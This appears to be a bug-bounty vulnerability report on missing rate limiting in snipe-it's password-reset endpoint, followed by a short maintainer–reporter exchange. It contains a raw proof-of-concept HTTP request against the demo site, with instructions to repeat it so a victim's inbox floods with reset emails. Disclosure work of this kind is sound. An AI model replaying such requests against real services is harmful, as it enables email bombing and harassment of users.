Insufficient Granularity of Access Control in snipe/snipe-it
Reported on
Oct 7th 2021
Description
There is no rate limit sent unlimited email victim or any email address
Proof of Concept
There is no rate limit return-password , attacker to send unlimited email to victim or any email address.
POST /password/email HTTP/1.1
Host: demo.snipeitapp.com
Connection: close
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo.snipeitapp.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed- exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.snipeitapp.com/password/reset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv48_session=h0w6J6utAn2wIe4EMMkWHJVI2PTaOzBPLLuOH4JG; XSRF- TOKEN=eyJpdiI6IkttM01uZ1lpMHZFY3I5a0wxVlVnUXc9PSIsInZhbHVlIjoiVVlvemxGd3JXQjkxNTh2OTJHNGpDZ3VzTGY4NFc1K1N4dld4ekFiN2h0Y1RscFZJa2pUcFVZVkpzamxKeGZhWG9IdlZxdlhaRkdtQk1iMkZ2dmJpVDc0Zmx2VDJqMkpNY0p6RWpDWW5ZWDV4MHN3OEZIYk1TYTk2aWlOUm9qNU4iLCJtYWMiOiI3ZWY0ZTYyNTNlNDEzZGQzOTI2OTVhYWQ2OWY4M2I3MmZjOWM1MTc4ODYzNGYzYTQ5MGYwY2NlMGE4ODVjNjMxIn0%3D
_token=qNXYj866UOlCog9UfSQl3U8NidUTWwBqKkzG8VoG&username=admin
Post data username= parameter value to victim username. this request unlimited time and victim email address will received unlimited verification email .
Impact
Attacker can sent unlimited email to any mail address .
Solution:
'reset_password_tries_limit'=>5, 'reset_password_tries'=>"int(10) unsigned DEFAULT '0'",
While this isn't incorrect, we have never ever seen this exploited in the wild. You'd need to know the URL and username of a user on the system.
Well, yes we need that, for every attack we need URL isn't it and about the valid username, an attacker may or may not know the username can do the dictionary attack to perform the attack.
https://hackerone.com/reports/145458 And please do refer this previously submitted report too https://huntr.dev/bounties/d33cd2a3-1cff-4a9d-a0d1-df7d01e2d1e2/